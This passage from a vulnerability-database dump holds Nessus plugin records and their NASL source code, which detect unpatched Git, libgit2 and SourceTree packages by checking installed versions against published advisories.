Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.(CVE-2018-11235)", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-12T00:00:00", "type": "nessus", "title": "Amazon Linux AMI : git (ALAS-2018-1035)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:emacs-git", "p-cpe:/a:amazon:linux:emacs-git-el", "p-cpe:/a:amazon:linux:git", "p-cpe:/a:amazon:linux:git-all", "p-cpe:/a:amazon:linux:git-bzr", "p-cpe:/a:amazon:linux:git-cvs", "p-cpe:/a:amazon:linux:git-daemon", "p-cpe:/a:amazon:linux:git-debuginfo", "p-cpe:/a:amazon:linux:git-email", "p-cpe:/a:amazon:linux:git-hg", "p-cpe:/a:amazon:linux:git-p4", "p-cpe:/a:amazon:linux:git-svn", "p-cpe:/a:amazon:linux:gitweb", "p-cpe:/a:amazon:linux:perl-Git", "p-cpe:/a:amazon:linux:perl-Git-SVN", "cpe:/o:amazon:linux"], "id": "ALA_ALAS-2018-1035.NASL", "href": "https://www.tenable.com/plugins/nessus/110458", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux AMI Security Advisory ALAS-2018-1035.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110458);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/04/05 23:25:05\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n script_xref(name:\"ALAS\", value:\"2018-1035\");\n\n script_name(english:\"Amazon Linux AMI : git (ALAS-2018-1035)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux AMI host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 
2.17.x before 2.17.1, code to sanity-check\npathnames on NTFS can result in reading out-of-bounds\nmemory.(CVE-2018-11233)\n\nIn Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2,\n2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution\ncan occur. With a crafted .gitmodules file, a malicious project can\nexecute an arbitrary script on a machine that runs 'git clone\n--recurse-submodules' because submodule 'names' are obtained from this\nfile, and then appended to $GIT_DIR/modules, leading to directory\ntraversal with '../' in a name. Finally, post-checkout hooks from a\nsubmodule are executed, bypassing the intended design in which hooks\nare not obtained from a remote server.(CVE-2018-11235)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/ALAS-2018-1035.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update git' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:emacs-git-el\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-all\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-bzr\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-cvs\");\n 
script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-daemon\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-email\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-hg\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-p4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:git-svn\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:gitweb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:perl-Git-SVN\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"A\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux AMI\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"emacs-git-el-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-all-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-bzr-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-cvs-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-daemon-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-debuginfo-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-email-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-hg-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-p4-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"git-svn-2.14.4-2.58.amzn1\")) flag++;\nif 
(rpm_check(release:\"ALA\", reference:\"gitweb-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-2.14.4-2.58.amzn1\")) flag++;\nif (rpm_check(release:\"ALA\", reference:\"perl-Git-SVN-2.14.4-2.58.amzn1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"emacs-git / emacs-git-el / git / git-all / git-bzr / git-cvs / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:32:05", "description": "The Git community reports :\n\n- In affected versions of Git, code to sanity-check pathnames on NTFS can result in reading out-of-bounds memory.\n\n- In affected versions of Git, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs 'git clone --recurse-submodules' because submodule 'names' are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with '../' in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.", "cvss3": {"score": 7.8, "vector": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2018-06-04T00:00:00", "type": "nessus", "title": "FreeBSD : Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235) (c7a135f4-66a4-11e8-9e63-3085a9a47796)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11233", "CVE-2018-11235"], "modified": "2019-10-11T00:00:00", "cpe": ["p-cpe:/a:freebsd:freebsd:git", "p-cpe:/a:freebsd:freebsd:git-lite", "cpe:/o:freebsd:freebsd"], "id": "FREEBSD_PKG_C7A135F466A411E89E633085A9A47796.NASL", "href": 
"https://www.tenable.com/plugins/nessus/110304", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the FreeBSD VuXML database :\n#\n# Copyright 2003-2019 Jacques Vidrine and contributors\n#\n# Redistribution and use in source (VuXML) and 'compiled' forms (SGML,\n# HTML, PDF, PostScript, RTF and so forth) with or without modification,\n# are permitted provided that the following conditions are met:\n# 1. Redistributions of source code (VuXML) must retain the above\n# copyright notice, this list of conditions and the following\n# disclaimer as the first lines of this file unmodified.\n# 2. Redistributions in compiled form (transformed to other DTDs,\n# published online in any format, converted to PDF, PostScript,\n# RTF and other formats) must reproduce the above copyright\n# notice, this list of conditions and the following disclaimer\n# in the documentation and/or other materials provided with the\n# distribution.\n# \n# THIS DOCUMENTATION IS PROVIDED BY THE AUTHOR AND CONTRIBUTORS \"AS IS\"\n# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,\n# THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR\n# PURPOSE ARE DISCLAIMED. 
IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS\n# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110304);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/10/11 10:17:50\");\n\n script_cve_id(\"CVE-2018-11233\", \"CVE-2018-11235\");\n\n script_name(english:\"FreeBSD : Git -- Fix memory out-of-bounds and remote code execution vulnerabilities (CVE-2018-11233 and CVE-2018-11235) (c7a135f4-66a4-11e8-9e63-3085a9a47796)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The Git community reports :\n\n- In affected versions of Git, code to sanity-check pathnames on NTFS\ncan result in reading out-of-bounds memory.\n\n- In affected versions of Git, remote code execution can occur. 
With a\ncrafted .gitmodules file, a malicious project can execute an arbitrary\nscript on a machine that runs 'git clone --recurse-submodules' because\nsubmodule 'names' are obtained from this file, and then appended to\n$GIT_DIR/modules, leading to directory traversal with '../' in a name.\nFinally, post-checkout hooks from a submodule are executed, bypassing\nthe intended design in which hooks are not obtained from a remote\nserver.\"\n );\n # https://vuxml.freebsd.org/freebsd/c7a135f4-66a4-11e8-9e63-3085a9a47796.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e1123c96\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:git\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:git-lite\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/29\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"git<2.13.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.14<2.14.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.15<2.15.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.16<2.16.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git>=2.17<2.17.1\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite<2.13.7\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.14<2.14.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.15<2.15.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.16<2.16.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"git-lite>=2.17<2.17.1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:pkg_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:51:03", "description": "The version of Atlassian SourceTree installed on the remote host is a version 0.5.1.0 prior to 2.6.9 . 
It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Atlassian SourceTree 0.5.1.0 < 2.6.9 Remote Code Execution Vulnerabilities", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-13385", "CVE-2018-13386"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:atlassian:sourcetree"], "id": "ATLASSIAN_SOURCETREE_2_6_9.NASL", "href": "https://www.tenable.com/plugins/nessus/117406", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117406);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-13385\", \"CVE-2018-13386\");\n script_bugtraq_id(102926);\n script_xref(name:\"IAVA\", value:\"2018-A-0056\");\n\n script_name(english:\"Atlassian SourceTree 0.5.1.0 < 2.6.9 Remote Code Execution Vulnerabilities\");\n script_summary(english:\"Checks the version of Atlassian SourceTree.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian SourceTree installed on the remote host is \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian SourceTree installed on the remote host\nis a version 0.5.1.0 prior to 2.6.9 . 
It is, therefore, affected by \nmultiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2018-07-18-953674465.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c961adc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian SourceTree 2.6.9 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13385\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:sourcetree\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"atlassian_sourcetree_detect.nbin\");\n script_require_keys(\"installed_sw/SourceTree\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\n#atlassian_sourcetree add conversions for b --> beta and a --> alpha\nvcf::atlassian_sourcetree::initialize();\n\napp_info = vcf::get_app_info(app:\"SourceTree\");\n\nconstraints = [{ \"min_version\" : \"0.5.1.0\", \"fixed_version\" : \"2.6.9\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-16T00:51:23", "description": "The version of Atlassian SourceTree installed on the remote host is a version 1.0b2 prior to 2.7.6 on Mac OSX. It is, therefore, affected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-09-11T00:00:00", "type": "nessus", "title": "Atlassian SourceTree 1.0b2 < 2.7.6 Remote Code Execution Vulnerabilities (Mac OSX)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-11235", "CVE-2018-13385", "CVE-2018-13386"], "modified": "2019-11-01T00:00:00", "cpe": ["cpe:/a:atlassian:sourcetree"], "id": "ATLASSIAN_SOURCETREE_2_7_6_MACOSX.NASL", "href": "https://www.tenable.com/plugins/nessus/117405", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117405);\n script_version(\"1.3\");\n script_cvs_date(\"Date: 2019/11/01\");\n\n script_cve_id(\"CVE-2018-11235\", \"CVE-2018-13385\", \"CVE-2018-13386\");\n script_bugtraq_id(102926);\n\n script_name(english:\"Atlassian SourceTree 1.0b2 < 2.7.6 Remote Code Execution Vulnerabilities (Mac OSX)\");\n script_summary(english:\"Checks the version of Atlassian 
SourceTree.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The version of Atlassian SourceTree installed on the remote host is \naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Atlassian SourceTree installed on the remote host\nis a version 1.0b2 prior to 2.7.6 on Mac OSX. It is, therefore, \naffected by multiple vulnerabilities.\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n # https://confluence.atlassian.com/sourcetreekb/sourcetree-security-advisory-2018-07-18-953674465.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c961adc1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Atlassian SourceTree 2.7.6 on Mac OSX or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-13385\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/07/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/18\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:atlassian:sourcetree\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"MacOS X Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 
and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"atlassian_sourcetree_detect_macosx.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/MacOSX/Version\", \"installed_sw/SourceTree\");\n\n exit(0);\n}\n\ninclude(\"vcf.inc\");\ninclude(\"vcf_extras.inc\");\n\nget_kb_item_or_exit(\"Host/MacOSX/Version\");\nget_kb_item_or_exit(\"Host/local_checks_enabled\");\n\n#atlassian_sourcetree add conversions for b --> beta and a --> alpha\nvcf::atlassian_sourcetree::initialize();\n\napp_info = vcf::get_app_info(app:\"SourceTree\");\n\nconstraints = [{ \"min_version\" : \"1.0b2\", \"fixed_version\" : \"2.7.6\"}];\n\nvcf::check_version_and_report(app_info:app_info, constraints:constraints, severity:SECURITY_HOLE);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-29T17:54:38", "description": "The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the dla-2936 advisory.\n\n - A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak memory addresses or cause a Denial of Service. (CVE-2018-10887)\n\n - A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to cause a Denial of Service. (CVE-2018-10888)\n\n - In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker can send a crafted smart-protocol ng packet that lacks a '\\0' byte to trigger an out-of-bounds read that leads to DoS. 
(CVE-2018-15501)\n\n - Integer overflow in the index.c:read_entry() function while decompressing a compressed prefix length in libgit2 before v0.26.2 allows an attacker to cause a denial of service (out-of-bounds read) via a crafted repository index file. (CVE-2018-8098)\n\n - Incorrect returning of an error code in the index.c:read_entry() function leads to a double free in libgit2 before v0.26.2, which allows an attacker to cause a denial of service via a crafted repository index file. (CVE-2018-8099)\n\n - A remote code execution vulnerability exists when Git for Visual Studio improperly sanitizes input, aka 'Git for Visual Studio Remote Code Execution Vulnerability'. This CVE ID is unique from CVE-2019-1349, CVE-2019-1350, CVE-2019-1354, CVE-2019-1387. (CVE-2019-1352)\n\n - An issue was found in Git before v2.24.1, v2.23.1, v2.22.2, v2.21.1, v2.20.2, v2.19.3, v2.18.2, v2.17.3, v2.16.6, v2.15.4, and v2.14.6. When running Git in the Windows Subsystem for Linux (also known as WSL) while accessing a working directory on a regular Windows drive, none of the NTFS protections were active.\n (CVE-2019-1353)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. path.c mishandles equivalent filenames that exist because of NTFS Alternate Data Streams. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1352. (CVE-2020-12278)\n\n - An issue was discovered in libgit2 before 0.28.4 and 0.9x before 0.99.0. checkout.c mishandles equivalent filenames that exist because of NTFS short names. This may allow remote code execution when cloning a repository. This issue is similar to CVE-2019-1353. 
(CVE-2020-12279)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": 9.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2022-03-21T00:00:00", "type": "nessus", "title": "Debian DLA-2936-1 : libgit2 - LTS security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-10887", "CVE-2018-10888", "CVE-2018-15501", "CVE-2018-8098", "CVE-2018-8099", "CVE-2019-1349", "CVE-2019-1350", "CVE-2019-1352", "CVE-2019-1353", "CVE-2019-1354", "CVE-2019-1387", "CVE-2020-12278", "CVE-2020-12279"], "modified": "2022-05-06T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:libgit2-24", "p-cpe:/a:debian:debian_linux:libgit2-dev", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DLA-2936.NASL", "href": "https://www.tenable.com/plugins/nessus/159090", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory dla-2936. 
The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159090);\n script_version(\"1.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/05/06\");\n\n script_cve_id(\n \"CVE-2018-8098\",\n \"CVE-2018-8099\",\n \"CVE-2018-10887\",\n \"CVE-2018-10888\",\n \"CVE-2018-15501\",\n \"CVE-2019-1352\",\n \"CVE-2019-1353\",\n \"CVE-2020-12278\",\n \"CVE-2020-12279\"\n );\n script_xref(name:\"IAVA\", value:\"2019-A-0454-S\");\n\n script_name(english:\"Debian DLA-2936-1 : libgit2 - LTS security update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Debian host is missing one or more security-related updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Debian 9 host has packages installed that are affected by multiple vulnerabilities as referenced in the\ndla-2936 advisory.\n\n - A flaw was found in libgit2 before version 0.27.3. It has been discovered that an unexpected sign\n extension in git_delta_apply function in delta.c file may lead to an integer overflow which in turn leads\n to an out of bound read, allowing to read before the base object. An attacker may use this flaw to leak\n memory addresses or cause a Denial of Service. (CVE-2018-10887)\n\n - A flaw was found in libgit2 before version 0.27.3. A missing check in git_delta_apply function in delta.c\n file, may lead to an out-of-bound read while reading a binary delta file. An attacker may use this flaw to\n cause a Denial of Service. (CVE-2018-10888)\n\n - In ng_pkt in transports/smart_pkt.c in libgit2 before 0.26.6 and 0.27.x before 0.27.4, a remote attacker\n can send a crafted smart-protocol ng packet that lacks a '\\0' byte to trigger an out-of-bounds read that\n leads to DoS. 
